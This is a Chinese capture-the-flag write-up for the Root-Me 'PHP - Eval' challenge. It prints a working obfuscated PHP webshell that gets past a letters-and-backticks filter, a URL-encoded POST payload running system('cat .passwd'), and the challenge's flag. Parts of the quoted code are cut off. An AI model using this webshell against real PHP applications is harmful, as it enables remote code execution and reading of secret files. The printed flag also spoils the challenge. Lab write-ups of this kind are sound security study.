Root-Me PHP - eval题解

做了一下PHP的题目，其他解法网上已经有了http://exp-blog.com/2019/01/02/pid-2597/

但是PHP eval这个题目没有详细的writeup,所以自己做了一下

PHP - Eval

http://challenge01.root-me.org/web-serveur/ch57/

进入题目查看给出的代码如下：

 
 PHP Calc 
 

    
    
Result
';
        eval('print '.$_POST['input'].";");
        print '';
    }
    else
        echo "
Dangerous code detected
";
}
?>

分析代码发现，需要突破preg_match函数的限制，给input传入参数，进而在eval中执行.

preg_match中限制输入不可以有字母和反引号，因此需要一个没有字母和反引号的webshell.

参考https://www.leavesongs.com/PENETRATION/webshell-without-alphanum.html

'>'<')+('>'>'<');
$_=$__/$__;

$____='';
$___="瞰";$____.=~($___{$_});$___="和";$____.=~($___{$__});$___="和";$____.=~($___{$__});$___="的";$____.=~($___{$_});$___="半";$____.=~($___{$_});$___="始";$____.=~($___{$__});

$_____='_';$___="俯";$_____.=~($___{$__});$___="瞰";$_____.=~($___{$__});$___="次";$_____.=~($___{$_});$___="站";$_____.=~($___{$_});

$_=$$_____;
$____($_[$__]);
?>

文章中这个webshell,没有字母数字和反引号，符合本题目要求

最后在burpsuit中进行操作，POST参数如下（注：webshell需要urlencode一下）

input=%24__%3d('%3e'%3e'%3c')%2b('%3e'%3e'%3c')%3b%24_%3d%24__%2f%24__%3b%24____%3d''%3b%24___%3d%22%e7%9e%b0%22%3b%24____.%3d~(%24___%7b%24_%7d)%3b%24___%3d%22%e5%92%8c%22%3b%24____.%3d~(%24___%7b%24__%7d)%3b%24___%3d%22%e5%92%8c%22%3b%24____.%3d~(%24___%7b%24__%7d)%3b%24___%3d%22%e7%9a%84%22%3b%24____.%3d~(%24___%7b%24_%7d)%3b%24___%3d%22%e5%8d%8a%22%3b%24____.%3d~(%24___%7b%24_%7d)%3b%24___%3d%22%e5%a7%8b%22%3b%24____.%3d~(%24___%7b%24__%7d)%3b%24_____%3d'_'%3b%24___%3d%22%e4%bf%af%22%3b%24_____.%3d~(%24___%7b%24__%7d)%3b%24___%3d%22%e7%9e%b0%22%3b%24_____.%3d~(%24___%7b%24__%7d)%3b%24___%3d%22%e6%ac%a1%22%3b%24_____.%3d~(%24___%7b%24_%7d)%3b%24___%3d%22%e7%ab%99%22%3b%24_____.%3d~(%24___%7b%24_%7d)%3b%24_%3d%24%24_____%3b%24____(%24_%5b%24__%5d)%3b&2=system('cat  .passwd');

结果：

  
  
    
    
    
PHP Calc
    

      
      
      

        
Result
        2M!xIng_PHP_w1th_3v4l_L0L